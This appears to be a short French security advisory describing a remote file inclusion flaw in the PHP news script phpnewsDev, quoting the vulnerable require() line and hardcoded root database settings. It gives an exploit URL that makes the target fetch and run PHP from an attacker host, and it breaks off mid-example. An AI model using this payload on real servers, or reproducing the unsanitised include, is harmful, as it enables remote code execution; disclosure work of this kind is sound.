phpnewsDev ********** Informations : °°°°°°°°°°°°°° Langage : PHP Tested version : 1 Website : ? Problème : Inclusion de fichiers Developpement : °°°°°°°°°°°°°°° phpnewsDev est un petit script de news, avec une partie administrative et membre, envois et consultation d'articles et de commentaires, gestion des archives,... La faille est une faille include() classique. Un dossier, /Include/, contient des fichiers à inclure dans les fichiers principaux. Deux de ces fichiers contiennent une faille. Le premier est Include/variables.php3, dans lequel on peut voir : ----------------------------------- $Mac="localhost"; $Uti="root"; $Mot=""; $Bd="phpnews"; $AnneeDeDemarrage="2000"; $MoisDeDemarrage="8"; $NbNouvelles=5; require("$Include/french.inc"); ?> ----------------------------------- On peut donc inclure le fichier http://[attacker]/french.inc grâce à l'url : http://[target]/variables.php3?Include=http://[attacker], et donc faire executer du code PHP contenu dans french.inc. Par exemple, french.inc pourrait contenir le code : print("